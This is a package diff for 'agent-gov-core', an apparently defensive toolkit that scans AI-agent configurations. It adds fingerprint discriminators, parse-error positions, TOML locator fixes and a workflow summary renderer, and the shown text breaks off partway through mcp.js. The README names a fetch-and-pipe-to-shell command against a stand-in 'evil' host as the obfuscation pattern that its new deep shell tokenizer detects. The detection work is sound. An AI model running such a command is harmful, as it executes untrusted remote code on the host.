agent-gov-core 0.4.2 → 0.5.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +0 -0
- package/README.md +8 -4
- package/dist/action.d.ts +30 -0
- package/dist/action.js +98 -0
- package/dist/finding.d.ts +16 -0
- package/dist/finding.js +13 -0
- package/dist/index.d.ts +4 -2
- package/dist/index.js +3 -2
- package/dist/jsonc.js +2 -1
- package/dist/locators.d.ts +3 -1
- package/dist/locators.js +96 -17
- package/dist/mcp.js +61 -2
- package/dist/parse-error.d.ts +54 -0
- package/dist/parse-error.js +85 -0
- package/dist/shell.d.ts +26 -0
- package/dist/shell.js +210 -1
- package/dist/toml.js +28 -7
- package/package.json +1 -1
- package/schemas/finding.schema.json +4 -0
package/CHANGELOG.md
CHANGED
|
Binary file
|
package/README.md
CHANGED
|
@@ -66,14 +66,16 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
|
|
|
66
66
|
- `isSeverity(v)`, `isToolKind(v)`, `isNamespacedKind(v)` — type guards
|
|
67
67
|
- `kind(tool, name)` — build a namespaced kind without hand-assembling the dotted string
|
|
68
68
|
- `createFinding({tool, name, severity, message, ...})` — convenience constructor that calls `kind()` and `fingerprintFinding()` for you
|
|
69
|
-
- `fingerprintFinding(finding)` — 16-character hex hash of `(kind, file, line, column)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe
|
|
69
|
+
- `fingerprintFinding(finding)` — 16-character hex hash of `(kind, file, line, column, salientKey?)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe. Pass `salientKey` (since v0.4.3) when multiple distinct findings can fire at the same site
|
|
70
70
|
- `validateFinding(value)` — runtime check against `schemas/finding.schema.json`, returns `{ ok, errors[] }`
|
|
71
71
|
|
|
72
72
|
### Config readers
|
|
73
|
-
- `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }
|
|
73
|
+
- `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`. When the underlying parser provides a byte offset, `parseError` is a `ConfigParseError` carrying `line`/`column`/`rawOffset` instead of a raw `Error`.
|
|
74
74
|
- `stripJsonComments(text)` — same logic exposed for in-memory text
|
|
75
|
-
- `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }
|
|
76
|
-
- `parseToml(text)` — same exposed for text
|
|
75
|
+
- `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }`. Errors are also `ConfigParseError` with `line`/`column`/`rawOffset` when resolvable.
|
|
76
|
+
- `parseToml(text)` — same exposed for text; throws raw `Error` (file-level wrapping happens in `readTomlObject`)
|
|
77
|
+
- `ConfigParseError` — structured parse error with `line`, `column`, `rawOffset`, and `cause`. Lets downstream tools emit a `*.config_syntax_error` finding pointing at the exact spot.
|
|
78
|
+
- `lineColumnOfOffset(text, offset)` — convert a 0-based byte offset to 1-based `{ line, column }`. Useful when a hand-rolled scanner exposes byte positions and a `Finding.location` needs line/column.
|
|
77
79
|
|
|
78
80
|
### Line locators
|
|
79
81
|
- `lineOfJsonKey(text, key, scope?)` — 1-based line of `"key":`, optionally scoped to a byte range
|
|
@@ -85,12 +87,14 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
|
|
|
85
87
|
|
|
86
88
|
### Shell tokenization
|
|
87
89
|
- `tokenizeShell(command)` — quote-aware split on `;`, `|`, `&&`, `||` plus trivial obfuscation neutralization (`c""url` → `curl`, `c\\url` → `curl`)
|
|
90
|
+
- `tokenizeShellDeep(command)` — recursively extracts commands nested inside `$(…)`, backticks, and `bash -c "…"` / `sh -c "…"` / `python -c "…"` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $(…)`. Single-quoted text is left untouched (literal, per shell semantics).
|
|
88
91
|
- `getCommandHead(subcommand)` — extract the leading verb after tokenization
|
|
89
92
|
|
|
90
93
|
### GitHub Action helpers
|
|
91
94
|
- `rankSeverity(s)` — numeric rank `low=1, medium=2, high=3, critical=4` (matches the schema's closed severity enum; there is no `none`)
|
|
92
95
|
- `passesSeverityThreshold(s, threshold)`, `anyAtOrAbove(findings, threshold)` — fail-on plumbing
|
|
93
96
|
- `emitFindingAnnotation(f)` — render a Finding as a `::warning file=…,line=…,title=…::…` GitHub workflow annotation
|
|
97
|
+
- `generateWorkflowSummary(findings, opts?)` — Markdown summary suitable for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks so 100% of findings remain visible even when GHA's inline-annotation cap (~10 per level, 50 per run) silently drops the rest
|
|
94
98
|
|
|
95
99
|
### Test fixtures (`agent-gov-core/test-utils`)
|
|
96
100
|
Secondary entry point used by consumer test suites. Zero overhead in production — only loaded when test files import it.
|
package/dist/action.d.ts
CHANGED
|
@@ -28,4 +28,34 @@ export declare function anyAtOrAbove(findings: readonly Finding[], threshold: Se
|
|
|
28
28
|
* // → '::error file=.github/workflows/ci.yml,line=12,title=[capability_echo.workflow_permission_write] high::Workflow grants contents: write to PR-triggered jobs.'
|
|
29
29
|
*/
|
|
30
30
|
export declare function emitFindingAnnotation(finding: Finding): string;
|
|
31
|
+
export interface WorkflowSummaryOptions {
|
|
32
|
+
/** Top-level heading. Default: `Findings`. */
|
|
33
|
+
title?: string;
|
|
34
|
+
/** Cap per severity group; remaining count rendered as `(+N more)`. Default: 100. */
|
|
35
|
+
perSeverityLimit?: number;
|
|
36
|
+
/** Truncate message to this many characters (with `…` suffix). Default: 200. */
|
|
37
|
+
messageMaxLength?: number;
|
|
38
|
+
}
|
|
39
|
+
/**
|
|
40
|
+
* Render a Markdown summary of findings suitable for writing to
|
|
41
|
+
* `$GITHUB_STEP_SUMMARY`. GitHub Actions caps inline annotations (~10 per
|
|
42
|
+
* level, 50 per run) and silently drops the rest; the step summary has no
|
|
43
|
+
* such cap, so a Markdown table guarantees that 100% of findings are visible
|
|
44
|
+
* in the workflow's run summary page even when annotations are truncated.
|
|
45
|
+
*
|
|
46
|
+
* Findings are grouped by severity (critical → high → medium → low) inside
|
|
47
|
+
* collapsible `<details>` blocks. Each row carries file, line, kind, and a
|
|
48
|
+
* length-capped message. Pipe characters in message text are escaped so they
|
|
49
|
+
* don't break Markdown table rendering.
|
|
50
|
+
*
|
|
51
|
+
* @example
|
|
52
|
+
* import { generateWorkflowSummary } from 'agent-gov-core';
|
|
53
|
+
* import { appendFileSync } from 'node:fs';
|
|
54
|
+
*
|
|
55
|
+
* const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
|
|
56
|
+
* if (process.env.GITHUB_STEP_SUMMARY) {
|
|
57
|
+
* appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
|
|
58
|
+
* }
|
|
59
|
+
*/
|
|
60
|
+
export declare function generateWorkflowSummary(findings: readonly Finding[], options?: WorkflowSummaryOptions): string;
|
|
31
61
|
//# sourceMappingURL=action.d.ts.map
|
package/dist/action.js
CHANGED
|
@@ -76,4 +76,102 @@ function escapeProperty(s) {
|
|
|
76
76
|
.replace(/:/g, '%3A')
|
|
77
77
|
.replace(/,/g, '%2C');
|
|
78
78
|
}
|
|
79
|
+
/**
|
|
80
|
+
* Render a Markdown summary of findings suitable for writing to
|
|
81
|
+
* `$GITHUB_STEP_SUMMARY`. GitHub Actions caps inline annotations (~10 per
|
|
82
|
+
* level, 50 per run) and silently drops the rest; the step summary has no
|
|
83
|
+
* such cap, so a Markdown table guarantees that 100% of findings are visible
|
|
84
|
+
* in the workflow's run summary page even when annotations are truncated.
|
|
85
|
+
*
|
|
86
|
+
* Findings are grouped by severity (critical → high → medium → low) inside
|
|
87
|
+
* collapsible `<details>` blocks. Each row carries file, line, kind, and a
|
|
88
|
+
* length-capped message. Pipe characters in message text are escaped so they
|
|
89
|
+
* don't break Markdown table rendering.
|
|
90
|
+
*
|
|
91
|
+
* @example
|
|
92
|
+
* import { generateWorkflowSummary } from 'agent-gov-core';
|
|
93
|
+
* import { appendFileSync } from 'node:fs';
|
|
94
|
+
*
|
|
95
|
+
* const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
|
|
96
|
+
* if (process.env.GITHUB_STEP_SUMMARY) {
|
|
97
|
+
* appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
|
|
98
|
+
* }
|
|
99
|
+
*/
|
|
100
|
+
export function generateWorkflowSummary(findings, options = {}) {
|
|
101
|
+
const title = options.title ?? 'Findings';
|
|
102
|
+
const perGroupLimit = options.perSeverityLimit ?? 100;
|
|
103
|
+
const messageMax = options.messageMaxLength ?? 200;
|
|
104
|
+
if (findings.length === 0) {
|
|
105
|
+
return `# ${title}\n\nNo findings.\n`;
|
|
106
|
+
}
|
|
107
|
+
const groups = {
|
|
108
|
+
critical: [],
|
|
109
|
+
high: [],
|
|
110
|
+
medium: [],
|
|
111
|
+
low: [],
|
|
112
|
+
};
|
|
113
|
+
for (const f of findings)
|
|
114
|
+
groups[f.severity].push(f);
|
|
115
|
+
const counts = {
|
|
116
|
+
critical: groups.critical.length,
|
|
117
|
+
high: groups.high.length,
|
|
118
|
+
medium: groups.medium.length,
|
|
119
|
+
low: groups.low.length,
|
|
120
|
+
};
|
|
121
|
+
const lines = [];
|
|
122
|
+
lines.push(`# ${title}`, '');
|
|
123
|
+
lines.push(`**Total**: ${findings.length} finding${findings.length === 1 ? '' : 's'} — ` +
|
|
124
|
+
`${counts.critical} critical, ${counts.high} high, ` +
|
|
125
|
+
`${counts.medium} medium, ${counts.low} low`);
|
|
126
|
+
lines.push('');
|
|
127
|
+
const severityOrder = ['critical', 'high', 'medium', 'low'];
|
|
128
|
+
for (const severity of severityOrder) {
|
|
129
|
+
const group = groups[severity];
|
|
130
|
+
if (group.length === 0)
|
|
131
|
+
continue;
|
|
132
|
+
const shown = group.slice(0, perGroupLimit);
|
|
133
|
+
const overflow = group.length - shown.length;
|
|
134
|
+
lines.push(`<details${severity === 'critical' || severity === 'high' ? ' open' : ''}>`);
|
|
135
|
+
lines.push(`<summary><strong>${group.length} ${severity}</strong></summary>`);
|
|
136
|
+
lines.push('');
|
|
137
|
+
lines.push('| File | Line | Kind | Message |');
|
|
138
|
+
lines.push('|------|------|------|---------|');
|
|
139
|
+
for (const f of shown) {
|
|
140
|
+
lines.push('| ' +
|
|
141
|
+
[
|
|
142
|
+
escapeMarkdownTableCell(f.location?.file ?? '—'),
|
|
143
|
+
f.location?.line ?? '—',
|
|
144
|
+
escapeMarkdownTableCell(f.kind),
|
|
145
|
+
escapeMarkdownTableCell(truncate(f.message, messageMax)),
|
|
146
|
+
].join(' | ') +
|
|
147
|
+
' |');
|
|
148
|
+
}
|
|
149
|
+
if (overflow > 0) {
|
|
150
|
+
lines.push(`| _(+${overflow} more ${severity} finding${overflow === 1 ? '' : 's'})_ | | | |`);
|
|
151
|
+
}
|
|
152
|
+
lines.push('');
|
|
153
|
+
lines.push('</details>');
|
|
154
|
+
lines.push('');
|
|
155
|
+
}
|
|
156
|
+
return lines.join('\n');
|
|
157
|
+
}
|
|
158
|
+
function truncate(s, max) {
|
|
159
|
+
if (s.length <= max)
|
|
160
|
+
return s;
|
|
161
|
+
return s.slice(0, Math.max(1, max - 1)) + '…';
|
|
162
|
+
}
|
|
163
|
+
function escapeMarkdownTableCell(s) {
|
|
164
|
+
// Escape HTML control characters so a finding message containing
|
|
165
|
+
// `</summary>` or `<h1>` can't break out of the `<details>` block we
|
|
166
|
+
// emit around each severity group. GitHub sanitizes script execution,
|
|
167
|
+
// but unescaped tags still let an attacker manipulate the visual layout
|
|
168
|
+
// of the workflow summary (collapse other groups, inject misleading
|
|
169
|
+
// headings, etc.).
|
|
170
|
+
return String(s)
|
|
171
|
+
.replace(/&/g, '&')
|
|
172
|
+
.replace(/</g, '<')
|
|
173
|
+
.replace(/>/g, '>')
|
|
174
|
+
.replace(/\|/g, '\\|')
|
|
175
|
+
.replace(/\r?\n/g, ' ');
|
|
176
|
+
}
|
|
79
177
|
//# sourceMappingURL=action.js.map
|
package/dist/finding.d.ts
CHANGED
|
@@ -26,6 +26,16 @@ export interface Finding {
|
|
|
26
26
|
location?: FindingLocation;
|
|
27
27
|
/** Stable identifier for dedupe across runs. Recommended: hash of (kind, location, salient fields). */
|
|
28
28
|
fingerprint?: string;
|
|
29
|
+
/**
|
|
30
|
+
* Optional discriminator that participates in the fingerprint hash. Set this
|
|
31
|
+
* when a single (kind, file, line) site can legitimately host multiple distinct
|
|
32
|
+
* findings — e.g. two suspicious imports on the same line, two MCP servers in
|
|
33
|
+
* the same JSON object, two npm dependencies declared in one package.json line.
|
|
34
|
+
* Without it, the meta-reviewer would dedupe them into one. Use a stable value
|
|
35
|
+
* that doesn't drift across reruns (package name, server name, rule id) — not
|
|
36
|
+
* a timestamp or counter.
|
|
37
|
+
*/
|
|
38
|
+
salientKey?: string;
|
|
29
39
|
/** Optional structured metadata; downstream meta-reviewers may inspect it. */
|
|
30
40
|
data?: Record<string, unknown>;
|
|
31
41
|
}
|
|
@@ -57,6 +67,12 @@ export interface CreateFindingSpec {
|
|
|
57
67
|
detail?: string;
|
|
58
68
|
location?: FindingLocation;
|
|
59
69
|
data?: Record<string, unknown>;
|
|
70
|
+
/**
|
|
71
|
+
* See {@link Finding.salientKey}. Pass when the same (kind, file, line) site
|
|
72
|
+
* can produce multiple distinct findings that must not collapse to one
|
|
73
|
+
* fingerprint.
|
|
74
|
+
*/
|
|
75
|
+
salientKey?: string;
|
|
60
76
|
/** Optional explicit fingerprint. If omitted, {@link fingerprintFinding} is computed. */
|
|
61
77
|
fingerprint?: string;
|
|
62
78
|
}
|
package/dist/finding.js
CHANGED
|
@@ -62,6 +62,8 @@ export function createFinding(spec) {
|
|
|
62
62
|
finding.detail = spec.detail;
|
|
63
63
|
if (spec.location !== undefined)
|
|
64
64
|
finding.location = spec.location;
|
|
65
|
+
if (spec.salientKey !== undefined)
|
|
66
|
+
finding.salientKey = spec.salientKey;
|
|
65
67
|
if (spec.data !== undefined)
|
|
66
68
|
finding.data = spec.data;
|
|
67
69
|
finding.fingerprint = spec.fingerprint ?? fingerprintFinding(finding);
|
|
@@ -99,6 +101,13 @@ export function fingerprintFinding(finding) {
|
|
|
99
101
|
finding.location?.line ?? '',
|
|
100
102
|
finding.location?.column ?? '',
|
|
101
103
|
];
|
|
104
|
+
// salientKey is appended ONLY when present. Appending `?? ''` would add a
|
|
105
|
+
// trailing pipe even for findings without salientKey, breaking the v0.4.2
|
|
106
|
+
// hash. This way pre-0.4.3 fingerprints stay stable for findings that
|
|
107
|
+
// never set salientKey, while new findings with one stay distinct.
|
|
108
|
+
if (finding.salientKey !== undefined) {
|
|
109
|
+
parts.push(finding.salientKey);
|
|
110
|
+
}
|
|
102
111
|
return createHash('sha256').update(parts.join('|')).digest('hex').slice(0, 16);
|
|
103
112
|
}
|
|
104
113
|
const FINDING_ALLOWED_KEYS = new Set([
|
|
@@ -109,6 +118,7 @@ const FINDING_ALLOWED_KEYS = new Set([
|
|
|
109
118
|
'detail',
|
|
110
119
|
'location',
|
|
111
120
|
'fingerprint',
|
|
121
|
+
'salientKey',
|
|
112
122
|
'data',
|
|
113
123
|
]);
|
|
114
124
|
const LOCATION_ALLOWED_KEYS = new Set(['file', 'line', 'column', 'endLine', 'endColumn']);
|
|
@@ -145,6 +155,9 @@ export function validateFinding(value) {
|
|
|
145
155
|
if (v.fingerprint !== undefined && typeof v.fingerprint !== 'string') {
|
|
146
156
|
errors.push('fingerprint must be a string when present');
|
|
147
157
|
}
|
|
158
|
+
if (v.salientKey !== undefined && typeof v.salientKey !== 'string') {
|
|
159
|
+
errors.push('salientKey must be a string when present');
|
|
160
|
+
}
|
|
148
161
|
if (v.data !== undefined && (v.data === null || typeof v.data !== 'object' || Array.isArray(v.data))) {
|
|
149
162
|
errors.push('data must be an object when present');
|
|
150
163
|
}
|
package/dist/index.d.ts
CHANGED
|
@@ -4,10 +4,12 @@ export type { JsonObjectWithSource } from './jsonc.js';
|
|
|
4
4
|
export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
|
|
5
5
|
export type { TomlObjectWithSource } from './toml.js';
|
|
6
6
|
export { readTomlObject, parseToml } from './toml.js';
|
|
7
|
+
export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
|
|
7
8
|
export type { ByteRange } from './locators.js';
|
|
8
9
|
export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
|
|
9
10
|
export type { McpCommandSpec } from './mcp.js';
|
|
10
11
|
export { normalizeMcpCommand } from './mcp.js';
|
|
11
|
-
export { tokenizeShell, getCommandHead } from './shell.js';
|
|
12
|
-
export {
|
|
12
|
+
export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
|
|
13
|
+
export type { WorkflowSummaryOptions } from './action.js';
|
|
14
|
+
export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
|
|
13
15
|
//# sourceMappingURL=index.d.ts.map
|
package/dist/index.js
CHANGED
|
@@ -1,8 +1,9 @@
|
|
|
1
1
|
export { SEVERITIES, TOOL_KINDS, isSeverity, isToolKind, isNamespacedKind, kind, createFinding, fingerprintFinding, validateFinding, } from './finding.js';
|
|
2
2
|
export { readJsonObjectWithSource, stripJsonComments } from './jsonc.js';
|
|
3
3
|
export { readTomlObject, parseToml } from './toml.js';
|
|
4
|
+
export { ConfigParseError, lineColumnOfOffset } from './parse-error.js';
|
|
4
5
|
export { lineOfJsonKey, lineOfJsonStringValue, lineOfTomlKey, } from './locators.js';
|
|
5
6
|
export { normalizeMcpCommand } from './mcp.js';
|
|
6
|
-
export { tokenizeShell, getCommandHead } from './shell.js';
|
|
7
|
-
export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, } from './action.js';
|
|
7
|
+
export { tokenizeShell, tokenizeShellDeep, getCommandHead } from './shell.js';
|
|
8
|
+
export { rankSeverity, passesSeverityThreshold, anyAtOrAbove, emitFindingAnnotation, generateWorkflowSummary, } from './action.js';
|
|
8
9
|
//# sourceMappingURL=index.js.map
|
package/dist/jsonc.js
CHANGED
|
@@ -1,4 +1,5 @@
|
|
|
1
1
|
import { readFileSync } from 'node:fs';
|
|
2
|
+
import { toConfigParseError } from './parse-error.js';
|
|
2
3
|
/**
|
|
3
4
|
* Strip `//` line comments, `/* ... *\/` block comments, and trailing commas from JSONC,
|
|
4
5
|
* preserving byte offsets (replacement is space-filled, newlines preserved) so downstream
|
|
@@ -113,7 +114,7 @@ export function readJsonObjectWithSource(path) {
|
|
|
113
114
|
return { value: parsed, json: parsed, text };
|
|
114
115
|
}
|
|
115
116
|
catch (err) {
|
|
116
|
-
return { value: undefined, json: undefined, text, parseError: err };
|
|
117
|
+
return { value: undefined, json: undefined, text, parseError: toConfigParseError(text, err) };
|
|
117
118
|
}
|
|
118
119
|
}
|
|
119
120
|
//# sourceMappingURL=jsonc.js.map
|
package/dist/locators.d.ts
CHANGED
|
@@ -28,7 +28,9 @@ export declare function lineOfJsonKey(text: string, key: string, scope?: ByteRan
|
|
|
28
28
|
* The value is JSON-encoded before matching so values containing backslashes
|
|
29
29
|
* (e.g. Windows paths like `C:\Temp` written as `"C:\\Temp"` in JSON) are
|
|
30
30
|
* located correctly. The scan ignores JSONC comments so a commented-out
|
|
31
|
-
* matching value does not shadow the real one.
|
|
31
|
+
* matching value does not shadow the real one. The negative lookahead skips
|
|
32
|
+
* occurrences in key position (`"command":`) so a value matching a key name
|
|
33
|
+
* elsewhere in the document doesn't return the key's line.
|
|
32
34
|
*/
|
|
33
35
|
export declare function lineOfJsonStringValue(text: string, value: string, scope?: ByteRange): number;
|
|
34
36
|
/**
|
package/dist/locators.js
CHANGED
|
@@ -26,11 +26,13 @@ export function lineOfJsonKey(text, key, scope) {
|
|
|
26
26
|
* The value is JSON-encoded before matching so values containing backslashes
|
|
27
27
|
* (e.g. Windows paths like `C:\Temp` written as `"C:\\Temp"` in JSON) are
|
|
28
28
|
* located correctly. The scan ignores JSONC comments so a commented-out
|
|
29
|
-
* matching value does not shadow the real one.
|
|
29
|
+
* matching value does not shadow the real one. The negative lookahead skips
|
|
30
|
+
* occurrences in key position (`"command":`) so a value matching a key name
|
|
31
|
+
* elsewhere in the document doesn't return the key's line.
|
|
30
32
|
*/
|
|
31
33
|
export function lineOfJsonStringValue(text, value, scope) {
|
|
32
34
|
const encoded = jsonEncodeForRegex(value);
|
|
33
|
-
return findLineByRegex(text, new RegExp(`"${encoded}"`), scope);
|
|
35
|
+
return findLineByRegex(text, new RegExp(`"${encoded}"(?!\\s*:)`), scope);
|
|
34
36
|
}
|
|
35
37
|
/**
|
|
36
38
|
* Convert a string to the form it would appear in JSON source bytes, then
|
|
@@ -56,43 +58,120 @@ export function lineOfTomlKey(text, dottedKey, scope) {
|
|
|
56
58
|
const parts = splitTomlDottedKey(dottedKey);
|
|
57
59
|
if (parts.length === 0)
|
|
58
60
|
return 0;
|
|
59
|
-
const leaf = parts[parts.length - 1];
|
|
60
|
-
const prefix = parts.slice(0, -1);
|
|
61
61
|
const lines = text.split(/\r?\n/);
|
|
62
62
|
const inScope = scopeLineFilter(text, scope);
|
|
63
|
-
// Find header range we're inside of.
|
|
64
|
-
let inTargetTable = prefix.length === 0;
|
|
65
63
|
let currentTable = [];
|
|
66
|
-
|
|
64
|
+
// Track multi-line basic (`"""`) and literal (`'''`) string state. A leaf-key
|
|
65
|
+
// pattern can otherwise match against decoy text inside a multi-line string
|
|
66
|
+
// value — see lineOfTomlKey regression tests.
|
|
67
|
+
let inMultilineString = null;
|
|
67
68
|
for (let i = 0; i < lines.length; i++) {
|
|
68
69
|
const lineNumber = i + 1;
|
|
69
70
|
const raw = lines[i];
|
|
71
|
+
const stateAtLineStart = inMultilineString;
|
|
72
|
+
inMultilineString = updateMultilineStringState(raw, inMultilineString);
|
|
73
|
+
// If we entered this line inside a multi-line string, never match. The key
|
|
74
|
+
// pattern there is part of a string literal, not a real assignment.
|
|
75
|
+
if (stateAtLineStart !== null)
|
|
76
|
+
continue;
|
|
70
77
|
const trimmed = raw.trim();
|
|
71
78
|
const headerMatch = /^\[\[?\s*([^\]]+?)\s*\]\]?\s*(#.*)?$/.exec(trimmed);
|
|
72
79
|
if (headerMatch) {
|
|
73
80
|
currentTable = splitTomlDottedKey(headerMatch[1]);
|
|
74
|
-
inTargetTable = currentTable.join('.') === targetHeader;
|
|
75
81
|
continue;
|
|
76
82
|
}
|
|
77
|
-
if (!inTargetTable)
|
|
78
|
-
continue;
|
|
79
83
|
if (trimmed === '' || trimmed.startsWith('#'))
|
|
80
84
|
continue;
|
|
81
85
|
if (!inScope(lineNumber))
|
|
82
86
|
continue;
|
|
83
|
-
//
|
|
84
|
-
|
|
85
|
-
|
|
87
|
+
// Generalized dotted-key matching: if the current table is a strict
|
|
88
|
+
// prefix of (or equal to) the target dotted key, try matching the
|
|
89
|
+
// REMAINING dotted segments on this line. Covers all three cases:
|
|
90
|
+
// - Top-level (`a.b.c = 1` at root): currentTable=[] → match `a.b.c`
|
|
91
|
+
// - Inside a parent (`[a]\nb.c = 1`): currentTable=['a'] → match `b.c`
|
|
92
|
+
// - Inside the exact table (`[a.b]\nc = 1`): currentTable=['a','b'] → match `c`
|
|
93
|
+
const tableIsPrefix = currentTable.length <= parts.length &&
|
|
94
|
+
currentTable.every((seg, idx) => seg === parts[idx]);
|
|
95
|
+
if (!tableIsPrefix)
|
|
96
|
+
continue;
|
|
97
|
+
const remaining = parts.slice(currentTable.length);
|
|
98
|
+
if (remaining.length === 0)
|
|
99
|
+
continue;
|
|
100
|
+
// Remaining-as-dotted-key match (covers any depth ≥ 1). Build the
|
|
101
|
+
// regex from individual segments joined by `\s*\.\s*` so spaced dotted
|
|
102
|
+
// keys (`a . b . c = 1` — valid TOML) match as well as compact ones.
|
|
103
|
+
const segmentsPattern = remaining.map(escapeForRegex).join('\\s*\\.\\s*');
|
|
104
|
+
const dottedPattern = new RegExp(`^\\s*${segmentsPattern}\\s*=`);
|
|
105
|
+
if (dottedPattern.test(raw))
|
|
86
106
|
return lineNumber;
|
|
87
|
-
//
|
|
88
|
-
if (
|
|
89
|
-
const
|
|
90
|
-
|
|
107
|
+
// If remaining is exactly the leaf, also try the quoted-leaf forms
|
|
108
|
+
if (remaining.length === 1) {
|
|
109
|
+
const leafKey = remaining[0];
|
|
110
|
+
const leafPattern = new RegExp(`^\\s*(?:${escapeForRegex(leafKey)}|"${escapeForRegex(leafKey)}"|'${escapeForRegex(leafKey)}')\\s*(?:\\.|=)`);
|
|
111
|
+
if (leafPattern.test(raw))
|
|
91
112
|
return lineNumber;
|
|
92
113
|
}
|
|
93
114
|
}
|
|
94
115
|
return 0;
|
|
95
116
|
}
|
|
117
|
+
/**
|
|
118
|
+
* Walk a line and update multi-line string state.
|
|
119
|
+
*
|
|
120
|
+
* Inside a basic multi-line string (`"""…"""`), a backslash escapes the next
|
|
121
|
+
* character — so `\"""` is a literal `"""` inside the value, NOT the string's
|
|
122
|
+
* closing delimiter. The walker must skip the next character after each `\`
|
|
123
|
+
* or it'll terminate the string state early and start matching key patterns
|
|
124
|
+
* against text that's still inside the value.
|
|
125
|
+
*
|
|
126
|
+
* Literal multi-line strings (`'''…'''`) do not process escapes per TOML spec,
|
|
127
|
+
* so backslash is inert there.
|
|
128
|
+
*/
|
|
129
|
+
function updateMultilineStringState(line, current) {
|
|
130
|
+
let state = current;
|
|
131
|
+
let pos = 0;
|
|
132
|
+
while (pos < line.length) {
|
|
133
|
+
if (state === '"""') {
|
|
134
|
+
// Inside a basic multi-line string — honor backslash escapes
|
|
135
|
+
if (line[pos] === '\\') {
|
|
136
|
+
pos += 2; // skip the backslash AND the next character
|
|
137
|
+
continue;
|
|
138
|
+
}
|
|
139
|
+
if (pos <= line.length - 3 && line.substr(pos, 3) === '"""') {
|
|
140
|
+
state = null;
|
|
141
|
+
pos += 3;
|
|
142
|
+
continue;
|
|
143
|
+
}
|
|
144
|
+
pos++;
|
|
145
|
+
continue;
|
|
146
|
+
}
|
|
147
|
+
if (state === "'''") {
|
|
148
|
+
// Literal multi-line — no escapes per spec
|
|
149
|
+
if (pos <= line.length - 3 && line.substr(pos, 3) === "'''") {
|
|
150
|
+
state = null;
|
|
151
|
+
pos += 3;
|
|
152
|
+
continue;
|
|
153
|
+
}
|
|
154
|
+
pos++;
|
|
155
|
+
continue;
|
|
156
|
+
}
|
|
157
|
+
// state === null
|
|
158
|
+
if (pos <= line.length - 3) {
|
|
159
|
+
const window = line.substr(pos, 3);
|
|
160
|
+
if (window === '"""') {
|
|
161
|
+
state = '"""';
|
|
162
|
+
pos += 3;
|
|
163
|
+
continue;
|
|
164
|
+
}
|
|
165
|
+
if (window === "'''") {
|
|
166
|
+
state = "'''";
|
|
167
|
+
pos += 3;
|
|
168
|
+
continue;
|
|
169
|
+
}
|
|
170
|
+
}
|
|
171
|
+
pos++;
|
|
172
|
+
}
|
|
173
|
+
return state;
|
|
174
|
+
}
|
|
96
175
|
function scopeLineFilter(text, scope) {
|
|
97
176
|
if (!scope)
|
|
98
177
|
return () => true;
|
package/dist/mcp.js
CHANGED
|
@@ -41,13 +41,47 @@ export function normalizeMcpCommand(spec) {
|
|
|
41
41
|
}
|
|
42
42
|
return parts.join('\n');
|
|
43
43
|
}
|
|
44
|
-
/**
|
|
44
|
+
/**
|
|
45
|
+
* Strip `.cmd`/`.exe`/`.bat`/`.ps1` suffix on Windows-style paths and
|
|
46
|
+
* lowercase those — Windows filesystem lookup is case-insensitive, so
|
|
47
|
+
* `NPX.CMD`, `npx.cmd`, and `npx` all refer to the same executable and
|
|
48
|
+
* should produce identical identity strings. POSIX paths (no backslash
|
|
49
|
+
* separator, no Windows suffix) keep their case because `./curl` and
|
|
50
|
+
* `./CURL` are genuinely different files there.
|
|
51
|
+
*/
|
|
45
52
|
function normalizeExecutable(cmd) {
|
|
46
53
|
const trimmed = cmd.trim();
|
|
47
54
|
const base = trimmed.replace(/\\/g, '/');
|
|
55
|
+
const hadWindowsSuffix = /\.(cmd|exe|bat|ps1)$/i.test(base);
|
|
48
56
|
const withoutSuffix = base.replace(/\.(cmd|exe|bat|ps1)$/i, '');
|
|
49
|
-
|
|
57
|
+
// Windows-shaped if the original used `\` separators or had a Windows
|
|
58
|
+
// executable suffix. In either case, case-fold for cross-machine identity.
|
|
59
|
+
const isWindowsShaped = hadWindowsSuffix || trimmed.includes('\\');
|
|
60
|
+
const cased = isWindowsShaped ? withoutSuffix.toLowerCase() : withoutSuffix;
|
|
61
|
+
// De-noise PATH-resolved runtimes: `/usr/bin/node` and `node` both run node.
|
|
62
|
+
// Only fold when the basename matches a known runtime so custom scripts at
|
|
63
|
+
// absolute paths (e.g. `/opt/internal/orchestrator.sh`) keep their identity.
|
|
64
|
+
const basename = cased.split('/').pop() ?? cased;
|
|
65
|
+
if (KNOWN_RUNTIMES.has(basename.toLowerCase())) {
|
|
66
|
+
return isWindowsShaped ? basename.toLowerCase() : basename;
|
|
67
|
+
}
|
|
68
|
+
return cased;
|
|
50
69
|
}
|
|
70
|
+
/**
|
|
71
|
+
* Common runtime executables whose absolute-path location varies across
|
|
72
|
+
* machines (PATH lookup resolves them) but whose identity for MCP-config
|
|
73
|
+
* purposes is the runtime name itself. Conservative — only entries where
|
|
74
|
+
* basename collapse is provably safe across the platforms an MCP config
|
|
75
|
+
* might be authored on.
|
|
76
|
+
*/
|
|
77
|
